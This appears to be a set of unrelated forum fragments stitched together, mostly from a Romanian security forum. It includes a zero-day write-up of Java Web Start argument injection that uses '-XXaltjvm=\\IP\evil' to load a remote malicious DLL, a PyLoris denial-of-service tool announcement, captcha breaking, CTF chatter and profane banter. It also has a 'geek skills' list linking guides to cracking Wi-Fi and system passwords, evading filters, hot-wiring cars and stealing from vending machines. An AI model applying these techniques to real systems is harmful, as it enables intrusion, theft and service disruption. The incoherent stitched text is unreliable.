[ebp+arg_4] .text:6DAA3EBA push eax .text:6DAA3EBB push offset aSDocbaseSS ; "\"%s\" -docbase %s %s" .text:6DAA3EC0 push esi ; LPSTR .text:6DAA3EC1 call ebx ; wsprintfA .text:6DAA3EC3 add esp, 14h .text:6DAA3EC6 jmp short loc_6DAA3ED4 .text:6DAA3EC8 ; --------------------------------------------------------------------------- .text:6DAA3EC8 .text:6DAA3EC8 loc_6DAA3EC8: ; CODE XREF: sub_6DAA3D96+11Fj .text:6DAA3EC8 push eax .text:6DAA3EC9 push offset aSS_0 ; "\"%s\" %s" .text:6DAA3ECE push esi ; LPSTR .text:6DAA3ECF call ebx ; wsprintfA .text:6DAA3ED1 add esp, 10h .text:6DAA3ED4 .text:6DAA3ED4 loc_6DAA3ED4: ; CODE XREF: sub_6DAA3D96+130j .text:6DAA3ED4 push 11h .text:6DAA3ED6 pop ecx .text:6DAA3ED7 xor eax, eax .text:6DAA3ED9 lea edi, [ebp+StartupInfo] .text:6DAA3EDC rep stosd .text:6DAA3EDE lea eax, [ebp+ProcessInformation] .text:6DAA3EE1 push eax ; lpProcessInformation .text:6DAA3EE2 xor ebx, ebx .text:6DAA3EE4 lea eax, [ebp+StartupInfo] .text:6DAA3EE7 push eax ; lpStartupInfo .text:6DAA3EE8 push ebx ; lpCurrentDirectory .text:6DAA3EE9 push ebx ; lpEnvironment .text:6DAA3EEA push ebx ; dwCreationFlags .text:6DAA3EEB push ebx ; bInheritHandles .text:6DAA3EEC push ebx ; lpThreadAttributes .text:6DAA3EED push ebx ; lpProcessAttributes .text:6DAA3EEE push esi ; lpCommandLine .text:6DAA3EEF lea eax, [ebp+ApplicationName] .text:6DAA3EF5 push eax ; lpApplicationName .text:6DAA3EF6 mov [ebp+StartupInfo.cb], 44h .text:6DAA3EFD call ds:CreateProcessA So basically the Java-Plugin Browser is running "javaws.exe" without validating command-line parameters. These parameters can be controlled by attackers via specially crafted embed html tags within a webpage. Let's see JavaDeploy.txt: if (browser == 'MSIE') { document.write('<' + 'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' + 'width="0" height="0">' + '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' + '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' + '<' + '/' + 'object' + '>'); } else if (browser == 'Netscape Family') { document.write('<' + 'embed type="application/x-java-applet;jpi-version=' + deployJava.firefoxJavaVersion + '" ' + 'width="0" height="0" ' + 'launchjnlp="' + jnlp + '"' + 'docbase="' + jnlpDocbase + '"' + ' />'); } That's it. This is how JAVA Plugin identifies Java Web Start content (jnlp files).So We can inject command-line parameters through "docbase" tag and even "launchjnlp". What type of arguments can we abuse to compromise a system? java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP... Linux Same logic error, check this function "_Z10launchJNLPPKcS0" in libnpjp2.so .text:0000A956 call _fork .text:0000A95B test eax, eax .text:0000A95D jnz loc_A813 .text:0000A963 mov [esp+3048h+var_3048], esi .text:0000A966 lea eax, [ebp+var_3038] .text:0000A96C mov [esp+3048h+var_3044], eax .text:0000A970 call _execv MACOSX Not vulnerable. Workaround Disable javaws/javaws.exe in linux and Windows by any mean. Disable Deployment Toolkit to avoid unwanted installation as stated in Tavis' advisory. Reverse Mode - [0DAY] JAVA Web Start Arbitrary command-line injection - "-XXaltjvm" arbitrary dll loading

iei warn daca nu pui o injuratura ! ))))

sa vad care scoate cea mai buna injuratura ! io zic pula mea.

If you consider yourself a geek, or aspire to the honor of geekhood, here's an essential checklist of must-have geek skills. The term 'geek', once used to label a circus freak, has morphed in meaning over the years. What was once an unusual profession transferred into a word indicating social awkwardness. As time has gone on, the word has yet again morphed to indicate a new type of individual: someone who is obsessive over one (or more) particular subjects, whether it be science, photography, electronics, computers, media, or any other field. A geek is one who isn't satisfied knowing only the surface facts, but instead has a visceral desire to learn everything possible about a particular subject. A techie geek is usually one who knows a little about everything, and is thus the person family and friends turn to whenever they have a question. If you're that type of person and are looking for a few extra skills to pick up, or if you're a newbie aiming to get a handhold on the honor that is geekhood, read on to find out what skills you need to know. 1. The Meaning of Technical Acronyms # USB - Universal Serial Bus # GPU - Graphics Processing Unit # CPU - Central Processing Unit # SATA - Serial ATA # HTML - Hyper-text Markup Language # HTTP - Hypertext Transfer Protocol # FTP - File Transfer Protocol # P2P - Person to Person data sharing 2. How to Reset RAM If you rolled your eyes here, that is a good thing. If not, you have many things to learn, young padawan. It's amazing how few people know how to do this. If you're unsure, hit up the link below to find out how: http://www.yousaytoo.com/sudjarwo/how-to-reset-ram-in-a-computer/29133 3. Identify Keyloggers Internet cafes are the most likely place you'll find them, followed by library, perhaps, and maybe even you own house if you've some unscrupulous friends/family. Identity theft groups warn about keyloggers and advocate checking out the keyboard yourself before continuing. Can you identify a keylogger, however, if one is plugged into the back of the system? Here's what one looks like: Hit up this link for excellent info on keyloggers on public computers and how to protect yourself: , http://www.ghacks.net/2007/06/28/how-to-defeat-most-keyloggers-on-public-computers/ 4. Surf the Web Anonymously We won't make any assumptions about why you may need this particular skill, but the fact remains that every geek should know how to traverse the Internet with the highest amount of security possible. Aside from the safest method--which is using a connection that is not yours--you will need the ultimate in proxies...Tor. Tor is an onion-routing system which makes it 'impossible' for someone to find out who you actually are. 5. Bypass a Computer Password on All Major Operating Systems Obviously you shouldn't use this to gain unlawful access to a computer. If you're a geek, however, you'll eventually end up in a situation where someone forgets their password, you acquire a machine with an operating system you cannot access, or similar situation. See this tutorial for info on how to bypass the password on the three major operating systems: Windows, Mac, and Linux. http://www.joetech.com/2009/01/29/how-to-crack-the-account-password-on-any-operating-system/ 6. Find a Users IP Address on AIM Knowing someones IP address is actually pretty useless in this case, but most people don't realize that. If someone is harassing you via AIM and you can't get them to stop, discovering their IP and sending it to them--with a nicely worded threat of law enforcement involvement should they not stop--is likely enough to send them scamping away with tail between legs. http://www.elitehackers.info/forums/archive/index.php/t-2827.html 7. Hide a File Behind a JPEG So you need a nice spot to hide your blackmail personal files. You could, of course, bury them deeply within a series of random, useless folders, but there's always the chance of them being discovered. A password protected RAR is the best choice, but it's a bit obvious despite the most boring title you could give it. A sneaky person would hide the important file behind a completely random and boring family reunion photo, where no person in their right mind would shift through. http://www.online-tech-tips.com/computer-tips/hide-file-in-picture/ 8. Crack a Wifi Password This is one of those things you don't need to do (hopefully), but that you still need to know just for the sake of knowledge. A strong WPA password is very secure, but most people don't want to bother learning a convoluted series of letters, numbers, and symbols, instead opting for random everyday words. A good overall tutorial on wifi and cracking can be found here: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks 9. Monitor Network Traffic The Internet is a vast place with a bit of everything. Whether you're curious about what your roommate is downloading, your kid is getting into, or any leeches living around you who've unscrupulously breached your wifi, knowing how to analyze network traffic is an invaluable skill. Here is a list of dozens of network analyzers, as well as some general info to get you started: http://www.slac.stanford.edu/xorg/nmtf/nmtf-tools.html 10. Recover Master Boot Record A virus or other problem can lead to an MBR error, which will make it impossible to access install. Many users would simply become frustrated and reinstall, but not you! Every geek should know how to recover the master book record. Here is an excellent guide to get started: http://www.ntfs.com/mbr-damaged.htm 11. Retrieve Data off Hard Drive There will come some point in your life when a hard drive craps out sans warning. It could be due to a number of reasons--physical damage, file corruption, etc. There are computer service centers that would be happy to extract the data for a (hefty) fee; a true geek would be the one working at center, not taking his or her drive there. To find out how to retrieve data off a damaged hard drive, read here: http://laptoplogic.com/resources/5-ways-to-retrieve-data-off-a-crashed-hard-drive 12. Load Rockbox onto an MP3 Player The firmware that comes on your average mp3 player is intended for those who are scared of advanced features; often, the only audio settings available are a few prearranged EQs. If you're an audiophile--or simply frustrated with the lack of control over your music settings--Rockbox is the firmware for you. Open source and free, it can be installed on several different types of players and enables full control over what you listen to. http://rockbox.org 13. Unbrick a Smartphone No geek can resist the allure of flashing the newest beta firmware onto their shiny smartphone. The byproduct of that is sometimes a bricked phone, which would leave many sobbing into their pillow at night. To avoid rendering your $400 gadget into a door stopper, learn the fine art of unbricking and then flash away. As the method used to fix a phone will vary, this is the best place to start looking for answers: http://www.howardforums.com/ 14. Replace a Laptop Keyboard Keyboards get gummy after awhile. If you use yours a lot (aka: all day), then you probably eat over it at some point. Crumbs get into the keys and things are sticking, and before you know it, you need a new keyboard. http://www.refurbished-laptop-guide.com/how-to-remove-a-laptop-keyboard.html 15. Rip Streaming Videos Streaming videos are officially in vogue. We're not going to make any assumptions about what type of videos you are streaming and may want to keep, but no matter what it is, any geek could rip them while sipping a Red Bull and watching the latest episode of BSG. Here's a hint to get you started: http://applian.com/download-videos/ 16. Strip Windows DRM DRM is incredibly annoying. With many online stores now offering DRM-free mp3 audio files, it would seem it's not as big of an issue as it used to be. That is not not the case, however, with all videos bearing a DRM as well as music of a higher-quality than MP3. Stripping Windows DRM is not legal. If you're a geek, your probably don't care: http://undrm.info/remove-DRM-protection/FairUse4WM-freeware-DRM-removal-Windows-software-Strip-copy-protection-from-WMV-ASF-WMA-Windows-Media-Player.htm 17. Homebrew Hack Game Systems Gaming consoles are notorious for having features you can't use simply because the manufacturer decided to lock them down. As a geek, you can't just be satisfied with the features they decided to give you. No, you have to crack that case open and take a peek inside. Every geek should know how to homebrew hack their system and unlock it's full potential. 18. Find a Website IP Address Without Web/Command Prompt Access Some school admins think they're being sneaky when they lock down the command prompt and block all major IP search websites and block all the websites you actually want to visit. Of course, that is child's play for any geek. First, to get a new command prompt, open Notepad and type: command.com. Then, save as "cmd.bat". You now have a command prompt. Now, open the command prompt and type "ping http://www.website.com/" to find the IP address of that website. Enter the website into the browser and you will officially have impressed all your friends. 19. Bypass School or Work Website Blocks What is a horrific situation for an average computer user is a simple irritation for an everyday geek. To bypass a website block/filter, simply enter that websites IP address in instead of the actual site address. 20. Screw with Wifi Leeches Nobody likes a wifi leech. At best, they're simply using up your valuable bandwidth. At the worst--and far more likely, they're stealing your identity and watching your activities. After watching your network and identifying the leech, use this trick to flip their browser upside down and let them know you don't appreciate the intrusion. http://tech.nocr.at/hacking-security/baffle-wifi-leeches-with-an-upside-down-ternet-2/ 21. Hexadecimal and Binary Number Systems Everyone knows the normal, everyday digit system used. It takes a special--possibly psychotic person--to also know hexadecimal and binary number systems. Here is an excellent interactive tutorial on learning the two systems: http://www.wisc-online.com/objects/index_tj.asp?objID=DIG1102 22. How to Hot Wire a Car If your family always turns to you any time their computer hiccups, their DVD player needs fixed, or their home security system doesn't activate, it's only a matter of time before someone asks you how to hot wire a car. Wouldn't it be great to be able to answer them? To learn this unique skill, read here: http://howto.wired.com/wiki/Hot_Wire_Your_Car 23. Increase Wifi Range With so many small portable gadgets gaining more and more sophisticated web browsers, in addition to gaming systems like the PSP and DS, getting the most use out of your wifi is practically a geek necessity. Here is a good guide on extending your wifi's range: http://www.mavromatic.com/archives/000451 24. Carrying a Computer Cleaning Arsenal on Your USB Drive A good geek prepares for their friends stupidity. No matter how many times you tell them to stop downloading porn, they keep doing it until their machine is so infected it can't drag itself into a grave. An arsenal of portable malware cleaners, a portable task manager, anti-virus, etc, will make those impromptu purging sessions all the easier. 25. Running an Operating System from a USB Thumb Drive Most people don't even understand what the magical operating system is. As a geek, you should transcend that basic knowledge and have a small operating system on your thumb drive handy for those times you need computer access but don't know the password to a nearby computer. http://www.pendrivelinux.com/ 26. Understand What "There's no Place Like 127.0.0.1" Means A lot of geeks wear this shirt as a short hand code for their computer finesse--or maybe just to screw with other people who stare but cannot figure out what it means. No matter the reason, if you'd like an answer, check out the link below. http://www.tech-faq.com/127.0.0.1.shtml 27. Read 1337 At Normal Speed Sure, everyone knows about it and it's no longer cool, but if you're going to proclaim yourself as a geek, you should be able to read it full speed. Who wants to choke in front of the wannabe that learned to read it full speed and flaunts it in your face? http://www.wikihow.com/Read-and-Write-in-1337 28. At Least One Fictional Language And not only should you know a fictional language, but you should use it to say something about yourself. Do you choose Klingon or Quenya? Here's a list of constructed languages: http://en.wikipedia.org/wiki/List_of_constructed_languages ##ADSENSE## 29. How to Survive in a Linux Argument Linux is gaining an all around higher standing in the geeksphere, and it's bound to enter a conversation at some point (which will invariably end up turning into an argument). If you want to keep up, you'll need to understand the basic points of Linux, as well as the general info of all basic things. Here's a good place to read and gain a foothold: http://www.linux.com/articles/feature/ 30. Identify Major Constellations For those times you venture from the air-conditioned, computer filled basement of your parents house (or something like that), look up at the stars and have yourself a Galileo moment. The stars may just be dots to many people, but with the handy website below, you'll be stopping man-belts and lions in no time. http://www.sky-watch.com/astronomy-guide/major-constellations.html 31. Use a Camera in Manual Mode Sure, you could just use auto mode like everyone else too afraid to learn what some letters and numbers mean, but then you wouldn't be much of a geek, would you? The oft-ignored dial on a camera is the key that unleashes the best quality photos possible, and every geek should be a whiz at using one. http://digital-photography-school.com/digital-camera-modes 32. Who Mulder and Scully Are It seems that in the plethora of geek websites, there always appears a joke about Mulder and Scully, the two main characters from the X-Files. If you don't know who they are, you'll be left in the dark, alone, contemplating what exactly it was you were doing in the 90's that you wouldn't understand the joke. http://en.wikipedia.org/wiki/Mulder_and_Scully_(song) 33. Javascript HTML is running the world (not really). Everyone knows some HTML and it makes them feel empowered. As a geek, you want to transcend that basic knowledge others share and know a little more. JavaScript is the answer--it is easy to learn if you're not actually interested in web programming, but simply curious, and it looks scary to anyone who doesn't know it. http://www.yourhtmlsource.com/javascript/basicjavascript.html 34. How to Unlock an iPhone Sure, most geeks wouldn't be caught dead with an iPhone, but what about your friends? You're the smart techie, they'll expect your to know how to unlock it. http://www.pcworld.com/article/137223/how_to_unlock_an_iphone.html 35. How to Install Mac OS X on a PC Just because you don't want Mac on your PC doesn't mean you shouldn't know how to do it. Knowledge is power, right? Go ahead, use this to stump your friends and family. http://dailyapps.net/2007/10/hack-attack-install-leopard-on-your-pc-in-3-easy-steps/ 36. Build a PC If you purchase a ready-made PC, you can be sure of one thing--you're paying more than you should. Assembling your own PC isn't too hard, and is the first thing you should be aiming to accomplish as a geek. Here is a massive article on assembling your own PC: http://www.pcmech.com/byopc/ 37. Tethering a Smartphone Nothing like a little wifi on the move, eh? Tethering a smartphone means using the Internet on your laptop/netbook via your cell phone. Of course, the method to do this depends on your phone, but here's an article to get your started: http://www.tech-recipes.com/rx/2276/smartphones_bb_treo_tether_modem_usa_carriers/ 38. Wiring a Home Theater System Home theater systems used to consist of a TV and a chair. Gone are those days of simplicity, however, and setting up a modern system can be pure mind-boggling horror. Where does the modulator go, why does the DVD player have no video and the cable box no sound? Here's a tutorial, including excellent diagrams, to show you how: http://www.prillaman.net/ht_info_8-wiring.html 39. Replacing a Laptop LCD Laptop LCDs are vulnerable to many different mishaps: accidental pressure spots, shadows, airsoft pellets.... No matter, there will come a point when you need to swap your LCD for a new one. Now, as a geek, you probably don't have an extended warranty. If that's the case, here are some excellent pages and pictures on replacing the display: http://www.fonerbooks.com/laptop_4.htm 40. Make a Laptop Cooling Pad Can you believe these cost $50?! A geek will need one, because data crunching/DVD ripping/videos playing/rendering at the same times tends to cause excess heat. Instead of shelling out your hard earned dollars, make your own like so: http://www.instructables.com/id/Lazy-mans-laptop-cooler/ 41. Unleash a Laser Pointer's full potential A normal person uses a laser pointer to drive their dog crazy. A geek uses it to melt butter for their grilled cheese sandwich. To unless a laser pointer's full strength, crack open the case, fry the resistor with a hot soldering iron, then snap it back together and keep it away from flesh/eyes/airplanes. The pointer will burn out after a few hours, but what a fun few hours they will be. Note: this is dangerous. Don't do anything stupid. 42. Keyboard Shortcuts This will depend on your operating system and the apps you use, so there's no tutorial available. However, that is irrelevant--you're a geek, you can find them yourself. Shortcuts are the difference between a slow computer user and a geek. The geek will always will out in a speed contest, because they do practically everything from their keyboard. 43. Soldering Glasses Together Nerds use tape on broken glasses; geeks use solder. 'Nuff said. 44. How to Execute a Shell Script If you're a true geek, you'll need to do this at some point. Below are instructions on how to do so. Remember: always be cautious when running a script, you don't want your computer to turn into a door stop, now do ya? http://www.mcsr.olemiss.edu/unixhelp/scrpt/scrpt1.2.html 45. How to Hack a Pop Machine Okay, so stealing isn't cool. Still, hacking is simply a misunderstood art, right? So hacking a pop machine isn't really stealing, because it's not about the pop, it about the pleasure of getting your way. Or something like that. (Newsflash, it is illegal, don't do it.) If you want to try your fingers at getting a free Coke, check out this link: http://skattertech.com/soda-machine-hack/ 46. Turn a Laptop into a Digital Picture Frame So you want to show off pictures of your dog and that girl you once met, but you want to do it in an uber geeky way. Any schmuck can go to Walmart and buy a digital picture frame for a grossly inflated price. But you...oh, you're too smart for that. No, instead you'll find an old laptop on eBay for $5 and turn it into a true work of art. http://repair4laptop.org/notebook_picture_frame.html 47. How to Mod a Flash Drive Case All the geeks are doing it.... Whatever. The case your flash drive came in is probably weak and most certainly plain. Why not jazz it up with your own unique style? Here's one such case mod, and dozens of related projects: http://www.instructables.com/id/Metal-USB---Flash-drive-case-mod/ 48. Do Cool Things to Altoids Tins People are obsessed with these things. Altoids tins are durable, small, and just begging to be filled with LEDs, mp3 players, audio amps, and maybe some snuff. A good geek will find millions of uses for these little metal wonders. If you need a mental boost, however, here's some interesting links: http://www.squidoo.com/altoids-tins 49. Convert Cassette Tapes to Digital Audio Files If your geekhood started in the 90's, then you probably have a least a few (dozen) cassette tapes still sitting around. Why not breathe digital life into them before they fall ill to mortal fate? http://lifehacker.com/software/mp3/alpha-geek-how-to-digitize-cassette-tapes-222394.php 50. Lock Your Computer with a USB Drive You don't want anyone getting into your files while you're gone. A normal password would be enough to keep most people out, but what if you got super-secret X files on your computer? You can lock your machine down with a USB drive via these instructions: http://lionjkt.wordpress.com/2008/12/31/how-to-lock-your-computer-with-usb-drive/ 51. Run Your Own Ethernet Line Wifi has taken the place of a wired connection in many homes, and with good reasons--you can go anywhere, no cables necessary. What about those...sensitive...activities that you'd rather the neighborhood script kiddie didn't see on your wifi? An Ethernet cable is your solution. To wire your own Ethernet, hit up this link: http://www.ertyu.org/steven_nikkel/ethernetcables.html 52. Set Up a Streaming Media Server With digital files becoming the ultimate medium, many people have hundreds of gigabytes worth of music, videos, and pictures. You could keep them on a portable hard drive, but then you're have to take it everywhere, and only one person could use it at a time. The solution is a streaming media server, something no geek can live without. http://www.n00tz.net/2008/07/vlc-media-server-ubuntu-hardy/ 53. Setting up a VPN If you're like most geeks, you can't live without your computers. They store your life in some poetic fashion, holding files you feel a personal connection with.... Anyway, if you are at work and suddenly realize you left an important picture at home (or you need blackmail material pronto), having a VPN ready to go will save you big time. http://www.computernetworkinghelp.com/content/view/41/1/ 54. Turn Webcams into Security Cameras Is someone stealing your Netflix DVDs? Do you suspect it is a fat hairy man in his boxers taking them each morning? If so, you can get your proof using a couple webcams and a bit of software. http://www.simplehelp.net/2006/09/27/how-to-use-your-pc-and-webcam-as-a-motion-detecting-and-recording-security-camera/ 55. Control Your House Lights with a Computer Controlling the lights in your house via computer is a great way to freak out the neighborhood kids ding-dong-ditching (assuming you wire up a Halloween scream motion sensor, also). If you reasons are less nefarious, you simply use it to turn on and off lights without having to life ye butt from thy seat, which is a good reason in itself. http://www.instructables.com/id/Control-lights-in-your-house-with-your-computer/ 56. Play Retro Games without Retro Consoles This applies to the geeks who enjoy gaming. Setting up an emulation PC on your TV is a great way to relive those games of old. 57. Put LEDs Inside a Lightbulb The days of hot incandescent and mercury-laden fluorescent are gone, and in are the days of long lasting, low heat, low consumption LEDs. As any good geek, you want to be able to say "I was doing X long before it became mainstream." Here's your chance--the following link will show you how to put an LED inside a lightbulb, something sure to stump your friends the same way Grandpa's ship-in-a-wine-bottle used to stump you. http://blog.makezine.com/archive/2006/06/make_a_led_bulb.html 58. Create Music with Keyboard How awesome is KeyBored? This little app gives all of your QWERTY keys a piano note. When you type, it sounds like an infant monkey punching a keyboard. If you've got some musical chops, it won't take you long to figure out the Star Wars theme or find a hidden musical message in Counter Strike control buttons. http://agdoa.net/ [edit:link updated] 59. Make Your Office Ergonomic Face it--you spend a lot of time at your desk. You might even have a few extra pounds and pallid skin to show for it. While those things are temporary, far to common and more serious is the carpal tunnel, eye strain, and back problems you'll develop from having a poor workspace. Hit up this link to create a body-friendly workspace that will keep you limber and flexible: http://www.ergotron.com/tabid/305/language/en-US/default.aspx 60. Adding a Third Monitor Studies show that dual monitor increase work productivity by 30%. As a geek, you'll need a third monitor to equal the dual setup of a layman (if that makes sense). While any hack with a VGA port can add a second monitor, it takes a true geek to add a third (or more). This will vary based on graphics/OS, so hit up Google for a tutorial or two. 61. How to Convert a DVD to x264 (or XviD or DivX) It might seem like child's play to you, but many individuals do not understand the fine art of converting a DVD into a digital file, let alone the careful skills it takes to achieve a happy balance between size and quality. Here is an excellent tutorial demonstrating how to rip a DVD with the multi-platform free software Handbrake: http://howto.diveintomark.org/ipod-dvd-ripping-guide/ 62. Flash System BIOS Ya gotta do it some time, so stop putting it off and man up. Flashing the BIOS on your laptop might seem scary (as it should--fear keeps you on your toes and prevents mistakes), but it's not (actually, it is, but if you even understand why you need to do this, you've gotta have at least a few chops by now). Warning--you can seriously bork your computer doing this! http://www.pcstats.com/articleview.cfm?articleID=1605 63. How to Irrecoverably Protect Data TrueCrypt, my friends. Learn to use TrueCrypt. If you have ask why, you don't need it. 64. The Fastest way to Kill a Computer It's said that you have to get into a killers mind to understand their weaknesses, right? Same goes for the unfortunate boobs who always kill their laptops. Here's a list of all the different ways you can accidentally kill a computer--arm your family and friends, and save yourself grief (because it's surely you they will call when something goes horribly, horribly wrong). http://www.pcstats.com/articleview.cfm?articleID=1720 Page:1/1 source : http://laptoplogic.com/resources/64-things-every-geek-should-know //as mai adauga 65. What boobies feel like.

trebuie tu sa ai grija de curu lu altu ? si asa suntem prea multi, sa moara prostii, n-am nimic impotriva.

pro. "oamenii ar trebui sa-si caute fericirea", daca fumatu le pica bine, de ce nu?

We have been waiting a long time for Motoma to release this version! Finally, he has released PyLoris version 3.0! “PyLoris is a tool for testing a web server’s vulnerability to Denial of Service (DoS) attacks. It uses the Slowloris method; by using all available connections web servers cannot complete valid requests. Supports SOCKS, SSL, and all HTTP request methods.” There are major changes in this version! This is a very brief change log: * Tkinter GUI * Scripting API * Inteligent Thread & Exception Handling * Supports options to be pulled from files * Multiple concurrent attack support * ScriptLoris class for easy extension and prepackaged attack creation * libloris module providing attack API * Highly configurable HTTP connection consuming DoS * HTTPS support * GET, POST, HEAD and other headers supported * SOCKS4 and SOCKS5 proxies supported * Written in Python * Cross Platform; supported on Windows, Linux, and Mac OS X * Forging Referer header for severs inaccessible directly * Gzip encoding to test for CEV-2009-1891 vulnerability * Many more bug fixes! Browse PyLoris Files on SourceForge.net

PWNtcha stands for "Pretend We’re Not a Turing Computer but a Human Antagonist", as well as PWN capTCHAs. This project’s goal is to demonstrate the inefficiency of many captcha implementations. PWNtcha ? Caca Labs

Ai spart tot, ai trecut de toate obstacolele si criptarile, felicitari sincere, Usr6 ! Indeed, game over, but not for long, vine partea a doua, mai interesanta, mai complicata, mai captivanta

pass = 1337; for(i = 1; i <= year; i++) { pass += year * i * year; } if(pass == 318338237039211050000) bla bla aici nu e mai exact : 1337 + x^2*1 + x^2*2 + ... + x^2*x = 318338237039211050000 ?

l-am facut. la ala te-ai impotmolit ? )) deschide ochii, parola e acolo unde nu ar trebui sa fie xD

super ! pentru parola noua, vei folosi hintul din readme.txt si o parola anterior folosita.